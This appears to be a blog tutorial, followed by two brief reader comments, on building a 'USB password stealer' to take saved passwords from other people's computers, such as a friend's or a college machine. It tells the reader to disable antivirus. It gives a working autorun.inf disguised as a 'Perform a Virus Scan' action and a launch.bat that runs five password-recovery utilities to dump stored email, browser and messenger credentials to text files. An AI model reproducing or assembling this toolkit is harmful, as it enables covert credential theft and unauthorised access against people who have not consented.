How To Create Your Own USB Stealer?
What Is A USB Stealer?
USBStealer is a Windows Based Password Hacker Tool that helps to Extract the password from Windows-Based Applications such as Chrome Password, FireFox Password, NetPassword, Admin passwords of the Windows Computer.
In This tutorial, I will show you how to Create Your Own USB password Stealer.
As we all know, Windows stores most of the passwords which are used on a daily basis, including instant messenger passwords such as MSN, Yahoo, AOL, Windows messenger etc.
Along with these, Windows also stores passwords of Outlook Express, SMTP, POP, FTP accounts and auto-complete passwords of many browsers like IE and Firefox. There exists many tools for recovering these passwords from their stored places. Using these tools and an USB pen-drive you can create your own rootkit to hack passwords from your friend’s/college Computer.
While you’re making your own stealers, a better understanding of some Windows Run Commands & keyboard shortcuts may help you more!
We need the following tools to create our rootkit:
Mail PassView
Recovers the passwords of the following email programs: Outlook Express, Microsoft Outlook 2000 (POP3 and SMTP Accounts only), Microsoft Outlook 2002/2003 (POP3, IMAP, HTTP and SMTP Accounts), IncrediMail, Eudora, Netscape Mail, Mozilla Thunderbird, Group Mail Free.
IE Passview,
IE PassView is a small utility that reveals the passwords stored by Internet Explorer browser. It supports the new Internet Explorer 7.0, as well as older versions of Internet explorer, v4.0 – v6.0
Protected Storage PassView
Recovers all passwords stored inside the Protected Storage, including the AutoComplete passwords of Internet Explorer, passwords of Password-protected sites, MSN Explorer Passwords, and more…
Download Protected Storage PassView
PasswordFox
PasswordFox is a small password recovery tool that allows you to view the user names and passwords stored by Mozilla Firefox Web browser. By default, PasswordFox displays the passwords stored in your current profile, but you can easily select to watch the passwords of any other Firefox profile. For each password entry, the following information is displayed: Record Index, Web Site, User Name, Password, User Name Field, Password Field, and the Signons filename.
MessenPass
Recovers the passwords of most popular Instant Messenger programs: MSN Messenger, Windows Messenger, Yahoo Messenger, ICQ Lite 4.x/2003, AOL Instant Messenger provided with Netscape 7, Trillian, Miranda, and GAIM.
Here is a step by step procedure to create the password hacking toolkit:
NOTE: You must temporarily disable your anti virus before following these steps.
Step 1.
Download all the 5 tools, extract them and copy only the executable (.exe files) into your USB Pen-drive.
i.e: Copy the files – mspass.exe, mailpv.exe, iepv.exe, pspv.exe and passwordfox.exe into your USB Drive.
Step 2.
Create a new Text Doc.(Using a Note Pad) and write the following text into it:
Code:
[autorun]
open = launch.bat
ACTION=Perform a Virus Scan
Save the notepad and rename it from
Rename the text file to “autorun.inf”.
Now copy the autorun.inf file into your USB pen-drive.
Step 3.
Create another Notepad and write the following text onto it:
Code:
start mspass.exe /stext mspass.txt
start mailpv.exe /stext mailpv.txt
start iepv.exe /stext iepv.txt
start pspv.exe /stext pspv.txt
start passwordfox.exe /stext passwordfox.txt
Save the Notepad and rename it to “launch.bat”. Copy the launch.bat file also to your USB drive.
Very interesting.
ReplyDeleteThanks ✌️